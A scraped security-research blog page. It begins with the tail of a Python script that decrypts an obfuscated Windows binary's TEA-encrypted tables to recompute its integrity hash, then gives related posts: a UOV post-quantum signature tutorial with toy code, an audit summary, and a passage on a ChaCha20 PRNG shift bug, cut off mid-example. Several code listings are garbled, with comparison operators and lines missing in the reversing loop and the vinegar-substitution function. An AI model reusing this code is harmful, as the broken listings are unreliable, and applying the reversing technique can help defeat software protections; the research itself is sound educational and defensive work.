  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

Demystifying Multivariate Cryptography

By: smarkelon
18 August 2023 at 16:38

As the name suggests, multivariate cryptography refers to a class of public-key cryptographic schemes that use multivariate polynomials over a finite field. Solving systems of multivariate polynomials is known to be NP-complete, thus multivariate constructions are top contenders for post-quantum cryptography standards. In fact, 11 out of the 50 submissions for NIST’s call for additional post-quantum signatures are multivariate-based. Multivariate cryptography schemes have received new interest in recent years due to the push to standardize post-quantum primitives. Sadly, the resources available online to learn about multivariate cryptography seem to fall into one of two categories, high level overviews or academic papers. The former is fine for getting a feel for the topic, but does not give enough details to feel fully satisfied. On the other hand, the latter is chock full of details, and is rather dense and complex. This blog post aims to bridge the gap between the two types of resources by walking through an illustrative example of a multivariate digital signature scheme called Unbalanced Oil and Vinegar (UOV) signatures. UOV schemes serve as the basis for a number of contemporary multivariate signature schemes like Rainbow and MAYO. This post assumes some knowledge of cryptography (namely what a digital signature scheme is), the ability to read some Python code, and a bit of linear algebra knowledge. By the end of the post the reader should not only have a strong conceptual grasp of multivariate cryptography, but also understand how a (toy) implementation of UOV works.

Preliminaries

A multivariate quadratic (which is the degree of polynomial we concern ourselves with in multivariate cryptographic schemes) is a quadratic equation with with two or more indeterminates (variables). For instance a multivariate quadratic equation (MQ) with three indeterminates can be written as: p(x,y,z)=ax^2 + by^2 + cz^2 + dxy + exz + fyz + gx + hy + iz + j where at least one of the second degree terms a,b,c,d,e,f is not equal to 0. With a MQ defined we can now describe the hard problem on which the security of MQ cryptography schemes are based – the so-called MQ problem.

MQ Problem
Given a finite field of q elements \mathbb{F}_{q} and m quadratic polynomials p_1,\ldots,p_m \in \mathbb{F}_q[X_1,\ldots,X_n] in n variables for m<n, find a solution (x_1,\ldots,x_n) \in \mathbb{F}^{n}_{q} of the system of equations. That is for i=1,\ldots,m we have p_i(x_1,\ldots,x_n) = 0. The MQ problem is known to be NP-complete, and it is thought that quantum computers will not be able to solve this problem more efficiently than classical computers. However, in order to be able to design secure cryptographic schemes based on the MQ problem, we need to find a trapdoor that allows a party with some private information to efficiently solve the problem. This is like knowing the factorization of the modulus N in RSA or the discrete-log in Diffie-Hellman key exchange. Generally, in multivariate public key signature schemes we define the public verification key \mathsf{pub} as an ordered collection of m multivariate quadratic polynomials in n variables over a finite field \mathbb{F}_q for n > m. That is \mathsf{pub} = p_1,\ldots,p_m \in \mathbb{F}_q [X_1,\ldots,X_n]. The verification function is then a polynomial map V_{\mathsf{pub}}: \mathbb{F}^{n}_{q} \rightarrow \mathbb{F}^{m}_q such that: V_{\mathsf{pub}}(X_1,\ldots,X_n) = (p_1(X_1,\ldots,X_n),\ldots,p_m(X_1,\ldots,X_n)). Note that our signatures will be of length n and messages (or likely in practice a hash of the message we are signing) will be encoded as m field elements in \mathbb{F}_q. One simply verifies signatures by ensuring that V_{\mathsf{pub}}(\mathrm{signature}) =\mathrm{message} for some message corresponding to the signature. The secret key (singing key) \mathsf{priv} is then some data on how \mathsf{pub} is generated that makes it easy to invert V_{\mathsf{pub}} and generate a valid signature for a given message. Generating a valid signature for a given message without knowledge of the secret key is exactly an instance of the MQ problem, and thus should be hard for even a quantum-capable adversary. However, we need special structure of \mathsf{pub} to ensure that a trapdoor exists so that parties with knowledge of \mathsf{priv} be easily able to sign messages. This reduces the problem space, and thus may lead to vulnerabilities in multivariate cryptography schemes. One such design that seems to have remained secure despite years of thorough cryptanalysis is Unbalanced Oil and Vinegar signatures. We will describe the scheme in the next section and present a toy implementation and a walkthrough to see how the inner mechanisms of the scheme work.

Unbalanced Oil and Vinegar Signatures

Unbalanced Oil and Vinegar (UOV) multivariate signatures were fist introduced by Kipnis, Patarin, and Goubin in 1999. One can find the original paper here. UOV is based on an earlier scheme, Oil and Vinegar signatures introduced by Patarin in 1997. The earlier scheme was broken by a structural attack discovered by Kipnis and Shamir in 1998. However, with a slight variation of the original scheme the UOV signature scheme was created and is thought to be secure. We will now go through the parts of the signature algorithm.

UOV Paramters

We choose a small finite field \mathbb{F}_{q}, where we usually select q=2^{k} for some small power k. The n input variables (X_1,\ldots,X_n) are divided into two ordered collections, the so-called oil and vinegar variables: X_1,\ldots,X_o = O_1,\ldots,O_o and X_{o+1},\ldots,X_{o+v} = V_1,\ldots,V_v, respectively, with n=o+v. The message to be signed or (likely the hash of said message) is represented as an element in \mathbb{F}^{o}_{q} and is denoted m=(m_1,\ldots,m_o). The signature is then represented as an element of \mathbb{F}^{o+v}_{q} and is denoted s=(s_1,\ldots,s_{o+v}).

Private (Signing) Key

Our secret key is a pair (L,\mathcal{F}). We take L to be a bijective and affine function such that L : \mathbb{F}^{o+v}_{q} \rightarrow \mathbb{F}^{o+v}_{q}. For our purposes we can take the meaning of affine to be that the outputs of the function can be expressed as polynomials of degree one in the n=o+v indeterminates and that our coefficients on such inputs are in the field \mathbb{F}_q. Then, \mathcal{F} (also referred to as the central map) is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j + \sum_{i} c_{i,k} O_i + \sum_{i} d_{i,k} V_i + e_k where k \in [1 \ldots o]. The coefficients a_{i,j,k}, b_{i,j,k}, c_{i,k}, d_{i,k}, e_{k} \in \mathbb{F}_{q} are selected randomly and are kept secret. Note, that vinegar variables “mix” quadratically with all other variables, but oil variables never “mix” with themselves. That is there are no O_i,O_j terms, hence the name of the scheme (although one might observe that this is not how actual salad dressing actually works).

Public (Verification) Key

Let X be an element of \mathbb{F}^{o+v}_{q} defined in the style of our input (x_1,\ldots,x_{o+v}). We then transform X into Z = L(X) = (z_1,\ldots,z_n), where L is our secret function. Each function f_k, k \in [1 \ldots o], can be written as a polynomial P_k of total degree two in the z_j unknowns, z \in [1 \ldots n] where n=o+v. We denote our public key, \mathcal{P}, as the ordered collection of these o polynomials in n=o+v unknowns: \forall k \in [1 \ldots o] \tilde{f}_{k} = P_{k}((z_1,\ldots,z_n)). That is to say we compose \mathcal{F} with L, \mathcal{P} = \mathcal{F} \circ L. We will elucidate how this computation is actually done in our illustrative example.

Signing

We solve for a signature s such that s=(s_1,\ldots,s_n) \in \mathbb{F}^{n}_{q} (where n=o+v) of message m (or hash of the message) m=(m_1,\ldots,m_o) \in \mathbb{F}^{o}_{q} in the following way. 1. Select random vinegar values v_{r,1},\ldots,v_{r,v} and substitute them into each of the k equations in \mathcal{F}. 2. We then are left to find the o unknowns o^{*}_1,\ldots,o^{*}_o that satisfy \mathcal{F}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}) = (m_1,\ldots,m_o). This is a linear system of equations in the oil variables, as we have no O_i,O_j terms in our private key. This can be solved using Gaussian elimination. 3. If the system is indeterminate, return to step 1. 4. Compute the signature of m=(m_1,\ldots,m_o) as s = (s_1,\ldots,s_n) = L^{-1}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}). In brief, we invert \mathcal{P} (solve the MQ problem) by using the secret structure of $\latex P$, i.e. the fact it is the composition of two linear functions, which are both easy to invert if you know said functions.

Verification

The recipient simply checks that \mathcal{P}(s_1,\ldots,s_n) = (m_1,\ldots,m_o).

Correctness

Recall that our verification key is \mathcal{P} = \mathcal{F} \circ L, and the signing key is (\mathcal{F},L). Our signature is of the form s= L^{-1} \circ \mathcal{F}^{-1}(m). Then we can show \mathcal{F} \circ L(L^{-1} \circ \mathcal{F}^{-1}(m)) =\mathcal{F} \circ \mathcal{F}^{-1}(m) =m as desired.

Security Considerations

As aforementioned the original Oil and Vinegar scheme is broken. That is, the case where v = o (or when they are quite close) is broken by the structural attack of Kipnis and Shamir. For v \geq o^{2} the scheme is not secure because of efficient algorithms to solve heavily under-determined quadratic systems. The current recommendation, for which no technique is known to reduce the difficulty of solving the MQ problem, is to set v = 2o or v =3o. Therefore, the scheme we examine is called Unbalanced due to the fact v \neq o.

Advantages and Problems of UOV

UOV, in addition to being thought to be quantum-resistant, provides very short signatures as compared to other post-quantum signature schemes like lattice-based and hash-based schemes. Moreover, the actual computational operations (while seemingly complex) only require additions and multiplications of small field elements that are fast and simple to implement even on constrained hardware. The largest issue with the UOV scheme is the size of the public keys. One needs to store approximately mn^{2}/2 coefficients for public keys. Techniques exist to expand about m(n^{2} - m^{2})/2 of the coefficients for the public key from a short seed, such that we only need to store m^{3}/2 coefficients. However, this is still a very large public key – about 66KB for 128 bits of security compared to just a 384 byte key for RSA at the same security level or a 1793 byte key for the lattice based scheme Falcon at a higher security level. Some modern candidates that use UOV as a base and how they go about trying to solve this key size problem will be discussed in the concluding remarks of this post

Illustrative Example

To illustrate how the UOV signatures work we implemented a toy implementation of a UOV scheme in Python3. The code is available here. It goes without saying that it is just for educational purposes and should not be used in any application desiring any real level of security. We will walk through the signing process step-by-step stopping to examine all values and intermediaries. We use NumPy to store polynomials in quadratic form, store our secret trapdoor linear transformation L, and to do linear algebra. We do note that the our UOV implementation is a slight simplification of the general description we give above. We discuss this next.

Simplification

In our above presentation of the UOV scheme we define our central map \mathcal{F} such that it contains not only quadratic terms, but also linear and constant terms. As a result, the public verification key \mathcal{P} also contains said terms. For the simplified variant we set these linear and constant terms to 0, and are left with only non-zero quadratic terms, that is our central map \mathcal{F} is a collection of homogenous polynomials of degree two. This simplified variant \mathcal{F} is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j where k \in [1 \ldots o] and all coefficients are in \mathbb{F}_{q}. This simplification presents a number of advantages. Namely, the components f_k of \mathcal{F} can we written as an upper triangular matrix in F_{q}^{n \times n} of quadratic forms. For the below example we set o=2,v=4.

Note that oil variables do not mix, so we have a block zero matrix in the upper-left of this representation. Further, this allows us to define our secret transformation L to be in GL_{n}(\mathbb{F}_q) where GL is the general linear group. That is (for our purposes) L is an invertible matrix with dimensions n \times n and entries in our field \mathbb{F}_q. One can always turn a homogenous system of polynomial equations in n variables into an equivalent system of n-1 variables by fixing one of the variables to $1$. In the reverse this process is called homogenization. Thus, we still preserve the structure of the UOV signing key with this simplification. In turn, from the point of view of a key-recovery attack the security of this simplified variant of UOV is equivalent to that of original UOV with n-1 indeterminates..

Parameters

A note on presentation: As opposed to above where we used \LaTeX typesetting for math, we will keep our mathematical notation in the prose in line with our choices in the code. That is we will use inline code blocks to typeset variable names and math (i.e. F is our central map.) We will work over the field GF(256). We use the galois package to do array arithmetic and linear algebra over the field. For more information about how to do arithmetic in Galois (finite) fields see this Wikipedia page. For this example we set o=3 and v=2o=6. These parameters are far to small to provide actual security, but work nicely for our illustrative example. Below is the parameter information our implementation spits out.

Galois Field:
  name: GF(2^8)
  characteristic: 2
  degree: 8
  order: 256
  irreducible_poly: x^8 + x^4 + x^3 + x^2 + 1
  is_primitive_poly: True
  primitive_element: x

The parameters are o=3 and v=6.

Key Generation

Private (Signing) Key

To generate the central map F generate o random multivariate polynomials in the style described in the simplified UOV scheme. Each polynomial is stored as a n x n = (o+v) x (o+v) NumPy matrix. The complete central map is a o-length list of these matrices.

def generate_random_polynomial(o,v):
    f_i = np.vstack(
    (np.hstack((np.zeros((o,o),dtype=np.uint8),np.random.randint(256, size=(o,v), dtype=np.uint8))),
    np.random.randint(256, size=(v,v+o),dtype=np.uint8))
    )
    f_i_triu = np.triu(f_i)
    return GF256(f_i_triu)

def generate_central_map(o,v):
    F = []
    for _ in range(o):
        F.append(generate_random_polynomial(o,v))
    return F

To generate our secret transformation L, we generate a random n x n matrix and ensure that it is invertible, as this will be necessary to compute signatures.

def generate_affine_L(o,v):
    found = False
    while not found:
        try:
            L_n = np.random.randint(256, size=(o+v,o+v), dtype=np.uint8)
            L = GF256(L_n)
            L_inv = np.linalg.inv(L)
            found = True
        except:
            found = False
    return L, L_inv

Then, we have a wrapper function that generates our private key using the above functions as the triple (F, L, L_inv). We deviate from the standard definition of the signing key by also storing the inverse of L, denoted L_inv.

def generate_private_key(o,v): 
    F = generate_central_map(o,v)
    L, L_inv = generate_affine_L(o,v)
    return F, L, L_inv

When we run this key generation code for our simple example, we get the following private key. We can see that F is three homogenous quadratics where the entries in the matrices represent the coefficients of said quadratics. Note the 0 terms where oil and oil terms would have coefficients (they do not mix)! Moreover, we only need an upper-triangular matrix as i,j and j,i for all i,j in [1...n] would specify the same coefficient.

Private Key:

F (Central Map) = 
0:
 [[  0   0   0 153 175 153  51 224  89]
 [  0   0   0  20 143  18 179  13 175]
 [  0   0   0  74 231 146 106 136 149]
 [  0   0   0 248 197  59  50  41  57]
 [  0   0   0   0 213  77 187 165  54]
 [  0   0   0   0   0  97 154  37 163]
 [  0   0   0   0   0   0  93 246  71]
 [  0   0   0   0   0   0   0 181 188]
 [  0   0   0   0   0   0   0   0   3]]

1:
 [[  0   0   0  71  26 115   9 248 114]
 [  0   0   0  31  53 162  77  82  46]
 [  0   0   0 254 178  43 219 124 196]
 [  0   0   0 150  85 216  38  28 197]
 [  0   0   0   0 147  73 216 111  98]
 [  0   0   0   0   0  30 140 222  36]
 [  0   0   0   0   0   0 108  54 105]
 [  0   0   0   0   0   0   0 253  38]
 [  0   0   0   0   0   0   0   0  55]]

2:
 [[  0   0   0  98  27 252 165  31  42]
 [  0   0   0 180 169 247 143 217 128]
 [  0   0   0  13 111  90  98  40 233]
 [  0   0   0 223 243 229 156 183  45]
 [  0   0   0   0  40 136  12 123  44]
 [  0   0   0   0   0 251  92  77 174]
 [  0   0   0   0   0   0  81 150  95]
 [  0   0   0   0   0   0   0 196 207]
 [  0   0   0   0   0   0   0   0 108]]

Further, we show L and L_inv and confirm that they were generated correctly as their product is the identity matrix, that is L · L_inv= I.

Secret Transformation L=:
[[  0 207  67 204  15  76 173  14  42]
 [193  54  49  19  64 222  93 165 108]
 [102 211 114  71  22 229 187 221 194]
 [196 251  77 219 159   4 110 107 241]
 [ 78  88  49 133 238 243  17 125 203]
 [ 95 159 145 105 221  55 185 165  24]
 [ 45  55  31  37 149 168   4  21  48]
 [163 127 150 135  56 210 241 110  25]
 [222   3 207 202 136  66 121  18 119]]

Secret Inverse Transformation L_inv=:
[[127 172  42  59  73  10 183 116  70]
 [ 33 153 229 239 106  99 227  54  51]
 [218 196 248  10 124  46  25  73 128]
 [ 15  36 200  28 138 156 210 164 229]
 [114 107 134 126  40 230 238 249  70]
 [ 88 100  51 161 145  52 157 138 130]
 [208 188  30 227  66 116 191 100 183]
 [172  88 227 121 142 132 247 223  18]
 [138 145 247 168 180  35 185 149  67]]

Confirming L is invertible as L*L_inv is I=:
 [[1 0 0 0 0 0 0 0 0]
 [0 1 0 0 0 0 0 0 0]
 [0 0 1 0 0 0 0 0 0]
 [0 0 0 1 0 0 0 0 0]
 [0 0 0 0 1 0 0 0 0]
 [0 0 0 0 0 1 0 0 0]
 [0 0 0 0 0 0 1 0 0]
 [0 0 0 0 0 0 0 1 0]
 [0 0 0 0 0 0 0 0 1]]

Public (Verification) Key

We compute our public verification key by computing L ∘ f for each f in F. This is made easy as we can do this in quadratic form, thus each f_p in P is computed as L_T · f · L for each f in F where L_T is the transpose of L.

def generate_public_key(F,L):
    L_T = np.transpose(L)
    P = []
    for f in F:
        s1 = np.matmul(L_T,f)
        s2 = np.matmul(s1,L)
        P.append(s2) 
    return P

The following is our collection of o=3 polynomials that make up our public verification key P again represented as a list of matrices, that result from the above calculation using F and L that we generated as our private key.

Public Key = F ∘ L = 

0:
[[246  74 117 248  72   5 143 224 135]
 [116  10  17 156  68 243 203 128 192]
 [148 215 239 220 212  65 184 253 214]
 [211 116 203 186  61  26 104  21 157]
 [155  87  23 174  10 242  98 215 238]
 [189 209 203 142 221 105 179 173   8]
 [109  27 161 201 155 133 197 180  66]
 [227 228 150  92 248  73 213 205 192]
 [ 51  30 193 111 242 244  74 177 154]]

1:
[[ 92 131 253  40 192 243 101 228 217]
 [114  70  34 148 150 144  29  53 193]
 [127 161   2 248  42 126 245 122 175]
 [249  59 218  30  46 114  58 214  97]
 [ 12 212 246 155  93  76 168 162 120]
 [108  53 107 153   7 216 233 137  93]
 [249 177  82 164   4 117  25 179 152]
 [107 105 135  34 189  97  53  29  38]
 [140 127 214 137 206 171  45 109 110]]

2:
[[156  73  34 203 141 187  88  54 168]
 [ 90 252 145  72 161 130  93 150 169]
 [112 158  75   6 174 157 206 192 193]
 [214 198 116 243 190 194 214  22   5]
 [ 74 231 235 113 151  91  75 122 123]
 [200  77 208 125  99 169 229 104  55]
 [184 128  22  88  42 170 139 233 189]
 [ 27 149  64  89  77 158 248  65 150]
 [ 93  59 212 106 143 221  24 178 242]]

Signing

To sign we first define some helper functions. The first picks v=6 random vinegar variable values rvv as specified in the signing algorithm.

def generate_random_vinegar(v):
    vv = np.random.randint(256, size=v, dtype=np.uint8)
    rvv = GF256(vv)
    return rvv

We then substitute this selection of random vinegar variables rvv in each f in F, collecting terms such that the only remaining unknowns will be o1,o2,o3 – our oil variables.

def sub_vinegar_aux(rvv,f,o,v):
    coeffs = GF256([0]* (o+1))
    # oil variables are in 0  lt;= i  lt; o
    # vinegar variables are in o  lt;= i  lt; n 
    for i in range(o+v):
        for j in range(i,o+v):
            # by cases
            # oil and oil do not mix
            if i  lt; o and j =o and j  gt;= o:
                ij = GF256(f[i,j])
                vvi = GF256(rvv[i-o])
                vvj = GF256(rvv[j-o])
                coeffs[-1] += np.multiply(np.multiply(ij,vvi), vvj)
            # have mixed oil and vinegar variables that contribute to o_i coeff
            elif i = o:
                ij = GF256(f[i,j])
                vvj = GF256(rvv[j-o])
                coeffs[i] += np.multiply(ij,vvj)
            # condition is not hit as we have covered all combos
            else:
                pass
    return coeffs

We collect the equations once the fixed random vinegar variables have been substituted (only leaving our unknown oil variables). This will be a linear system of o=3 equations in o=3 unknowns – which is easy to solve!

def sub_vinegar(rvv,F,o,v):
    subbed_rvv_F = []
    for f in F:
        subbed_rvv_F.append(sub_vinegar_aux(rvv,f,o,v))
    los = GF256(subbed_rvv_F)
    return los

To solve the system we separate the coefficients on the unknown oil variables M from the constant terms c. We then take our message m (which is an element of length o in GF(256)) and subtract c from it to form the y that we need to find a solution x for. We then solve for said x. Finally, we compute the signature s for m by stacking x with the selected random vinegar variables rvv and taking s as the product of the inverse of our secret transformation L_inv and the stacked solution x and the random vinegar variables rvv.

def sign(F,L_inv,o,v,m):
    signed = False
    while not signed:
        try:
            rvv = generate_random_vinegar(v)
            los = sub_vinegar(rvv,F,o,v)
            M = GF256(los[:, :-1])
            c = GF256(los[:, [-1]])
            y = np.subtract(m,c)
            x = np.vstack((np.linalg.solve(M,y), rvv.reshape(v,1)))
            s = np.matmul(L_inv, x)
            signed = True
        except:
            signed = False
    return s

For this example we select m=[10,25,11] to be Évariste Galois’s – the father of finite fields – birthday.

m =
[[10]
 [25]
 [11]]

We then select our random vinegar values rvv.

rvv = [120 104 210   3   0 154]

After substitution we are left with the following M.

M =
[[252 223  17 183]
 [200 254 141 176]
 [116 200  15  43]]

We separate out the constant terms c of the linear oil system and subtract them from the message values m and solve the linear system using Gaussian elimination.

y = m-c =
 [[10]
 [25]
 [11]] 
-
 [[183]
 [176]
 [ 43]]
 =
 [[189]
 [169]
 [ 32]]

f(o1,o2,o3) =
 [[252 223  17]
 [200 254 141]
 [116 200  15]]|[[189]
 [169]
 [ 32]]

This yields the solution o1,o2,o3 =
 [[68]
 [49]
 [94]]

We stack this solution x with our random vinegar variables rvv to form a complete solution to the non-linear multivariate polynomial system of equations:

[x | rvv] =
 [[ 68]
 [ 49]
 [ 94]
 [120]
 [104]
 [210]
 [  3]
 [  0]
 [154]]

We can check out solution by plugging them into the central map.

m = x_T · F · x =
 [[10]
 [25]
 [11]]

We see that this check works and we finally we compute our signature as:

s = L_inv · x =
 [[ 50]
 [ 79]
 [107]
 [122]
 [209]
 [241]
 [ 80]
 [173]
 [241]]

Verification

To verify the message we simply compute P(s1,s2,...,sn) and check that the result (our computed message) is equal to the corresponding original message. This is made easy as we can do this in quadratic form, thus for each f_p in P we compute s_T · f_p · s where s_T is the transpose of s.

def verify(P,s,m):
    cmparts= []
    s_T = np.transpose(s)
    for f_p in P:
        cmp1 = np.matmul(s_T,f_p)
        cmp2 = np.matmul(cmp1,s)
        cmparts.append(cmp2[0])
    computed_m = GF256(cmparts)
    return computed_m, np.array_equal(computed_m,m)

Now let’s see if our signature is correct given our public_key and message.

computed_message = s_T · P · s=
[[10]
 [25]
 [11]]

computed_message == message is True

Hey, it works!

Exhaustive Test

As a sanity check we wrote a test function that generates a random private, public key pair for small parameters o=2, v=4. We continue to work over the field GF(256). With these parameters note that the messages we will be signing will be of field elements in GF(256) of length 2. As field elements taken on values in the range 0 to 255 there are 256**2 = 65536 total messages in the message space. We generate all messages in the message space and check that we can generate valid signatures for all of them.

# test over the entire space of messages for small parameters
def test():
    o = 2 
    v = 4
    F, L, L_inv = generate_private_key(o,v) # signing key
    P = generate_public_key(F,L) # verification key

    total_tests = 0
    tests_passed =0

    for m1 in range(256):
     for m2 in range(256):
         total_tests+=1
         m = GF256([[m1],[m2]])
         s = sign(F,L_inv,o,v,m)
         computed_m,verified = verify(P,s,m)
         if verified:
             tests_passed+=1
         print(f"Test: {total_tests}\nMessage:\n{m}\nSignature:\n{s}\nVerified:\n{verified}\n")
    
    print(f"{tests_passed} out of {total_tests} messages verified.")

We now look at the output of the test and see that we were able to generate signatures for every message in the message space. This instills confidence in the validity of our implementation. The full test_results.txt file for one random key pair is included in the GitHub repository of our implementation that is linked above.

Test: 1
Message:
[[0]
 [0]]
Signature:
[[ 53]
 [211]
 [161]
 [  6]
 [228]
 [124]]
Verified:
True
.
.
.
Test: 65536
Message:
[[255]
 [255]]
Signature:
[[144]
 [ 98]
 [143]
 [  0]
 [124]
 [122]]
Verified:
True

65536 out of 65536 messages verified.

Concluding Remarks

Multivariate cryptography has seen renewed interest recently due to the call for the standardization of post-quantum cryptography. Recall that the main issue with UOV signature schemes are that the public keys are huge. Many contemporary schemes have tried to solve this issue. For instance, Rainbow is a scheme based on a layered UOV approach that reduces the size of the public key. It was selected as one of the three NIST Post-quantum signature finalists. However, a key recovery attack was discovered by Beullens and Rainbow is no longer considered secure. Note, this attack does not break UOV, just Rainbow. Furthermore, MAYO was put forth as a possible post-quantum signature candidate in NIST’s call for additional PQC signatures. MAYO uses small public keys comparable to that of lattice based schemes that are “whipped-up” during signing and verification – for details go to the MAYO website. In addition to exploring Rainbow and MAYO, in may interest the reader to explore Hidden Field Equations, which is another construction of multivariate cryptography schemes.

Acknowledgments

Thank you to Paul Bottinelli and Elena Bakos Lang for their thorough reviews and thoughtful feedback on this blog post. All remaining errors are the author’s.

Public Report – Penumbra Labs R1CS Implementation Review

21 August 2023 at 15:59

In July 2023 Penumbra Labs engaged NCC Group’s Cryptography Services team to perform an implementation review of their Rank-1 Constraint System (R1CS) code and the associated zero-knowledge proofs within the Penumbra system. These proofs are built upon decaf377 and poseidon377, which have been previously audited by NCC Group, with a corresponding public report. The review was performed remotely with three consultants contributing 20 person-days over a period of two weeks, along with one additional consultant shadowing.

The review was scoped to R1CS-related functionality within the Penumbra codebase, including fixed-point arithmetic and proofs for Spend, Output, Swap, Swap Claim, Delegator Vote, and Undelegate Claim, alongside modifications to made to Zcash Sapling relating to key hierarchy, asset-specific generators, note format, tiered commitment tree, nullifier derivation, balance commitment, and usage of payload keys. R1CS gadgets in decaf377 and poseidon377 were also reviewed.

Dancing Offbit: The Story of a Single Character Typo that Broke a ChaCha-Based PRNG

22 August 2023 at 13:00

Random number generators are the backbone of most cryptographic protocols, the crucial cornerstone upon which the security of all systems rely, yet they remain often overlooked. This blog post presents a real-world vulnerability discovered in the implementation of a Pseudo-Random Number Generator (PRNG) based on the ChaCha20 cipher.

Discovery of a biased PRNG

During a recent engagement, we were tasked with reviewing a ChaCha20-based PRNG, following a design similar to the Rust ChaCha20Rng. The implementation under review was written in Java and a first pass over the source implementation did not reveal any glaring issue.

Similarly, a glance over the output produced by the PRNG seemed normal at first. As an example, the PRNG produced the following 32-byte sequence when seeded with a random seed:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19

Note that since Java does not support unsigned primitive types, bytes are interpreted in two’s complement representation and a byte can take any value from -128 to 127.

However, when generating longer outputs, some curious patterns started to emerge. Consider the following 128-byte output, seeded with the same random value as before:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19, 48, 41, 127, -90, -62, -31, -103, -59, -51, 82, 49, 72, 103, -112, 76, -67, 29, -88, 126, -101, -85, -1, -1, -1, 10, 81, 8, -76, -126, -1, -1, -1, -62, -21, 79, 104, -120, 55, -125, -70, 2, 108, -95, 74, -44, 89, -124, -20, 30, 76, -126, 90, 69, -1, -1, -1, 39, -110, -48, -34, 83, -1, -1, -1, 16, 41, 2, 115, -100, 96, 28, -65, -44, -73, 102, -123, 45, -11, -117, -128, 7, -55, -10, -50, -38, -1, -1, -1, 81, 127, -69, -22, 124, 82, 51, 112

Starting at byte 54, sequences of triplets of -1 are repeated multiple times, too often for this pattern to be random. Note that -1 is equivalent to the byte value 0xFF (that is, the byte exclusively composed of 1-bits: 0b1111 1111), but Java interprets and displays that value as -1.

Identifying the root cause

Driven by the feeling that something was amiss, we delved into the code once more and eventually narrowed down the faulty code to the rotateLeft32() function, a critical building block of ChaCha20. This function is excerpted below for convenience.

private static int rotateLeft32(int x, int k) {
    final int n = 32;

    int s = k   (n - 1);
    return x << s | x >> (n - s);
}

At a first glance, this function seems to perform a fairly standard left rotation on 32-bit values. Since Java does not have a primitive type for unsigned integers, this function operates on signed integers. Upon more careful inspection, we discovered something wrong with the right shift operation performed in the return statement of the function. The >> operator used in the function above performs a signed right shift in Java (also known as an arithmetic right shift, or a sign-propagating right shift since it preserves the sign of the resulting number).

When shifting an integer by one with the >> operator, the most significant bit (i.e., the leftmost bit) is not unconditionally replaced by a zero, but by a bit corresponding to the sign bit of the shifted value (0 for a positive integer, 1 for a negative integer). Since the return value of the rotateLeft32() function is computed using a boolean “or” of that shifted quantity, a superfluous 1-bit resulting from shifting a negative input value will be propagated to the output. Hence, the rotateLeft32() function may produce incorrect results when performing the bitwise rotation of negative 32-bit integers.

In contrast, the operator >>> performs an unsigned right shift (or logical right shift) in Java, where the extra bits shifted off to the right are discarded and replaced with zero bits regardless of the sign of the original value. It is this operator that should have been used in the rotateLeft32() function. This subtle difference is very specific to Java. In Rust for example, the type of the value shifted dictates which shift variant to use, as explained in The Rust Reference book, in the section on Arithmetic and Logical Binary Operators:

Arithmetic right shift on signed integer types, logical right shift on unsigned integer types.

Impact

The impact of this issue in the rotation function could already be observed visually by the repeated presence of -1s. In order to understand why using a signed right shift results in an increased probability of generating -1 bytes, let us look at the ChaCha function using that left rotation operation, namely the Quarter Round function, see RFC 7539:

a += b; d ^= a; d <<<= 16;
c += d; b ^= c; b <<<= 12;
a += b; d ^= a; d <<<= 8;
c += d; b ^= c; b <<<= 7;

For each call to the ChaCha Quarter Round function, internal state variables are left-rotated (using the rotateLeft32() function) by some fixed values, as highlighted above. Consider what happens when left-rotating a value with a single 1-bit using the function above. For illustration purposes, we’ll use the value 0x80000000 which corresponds to the quantity 10000000 00000000 00000000 00000000 (split into 8-bit chunks for clarity, and where obvious repeated sequences of 0s are replaced with ...).

 rotateLeft32(1000 ... 0000, 16)
 = 1000 ... 0000 << 16 | 1000 ... 0000 >> 16
 = 00 ... 0 | 1100 ... 0000 >> 15
 = 1110 ... 0000 >> 14
 = ...
 = 11111111 11111111 10000000 00000000
 = 0xFFFF8000
 = {-1, -1, -128, 0}

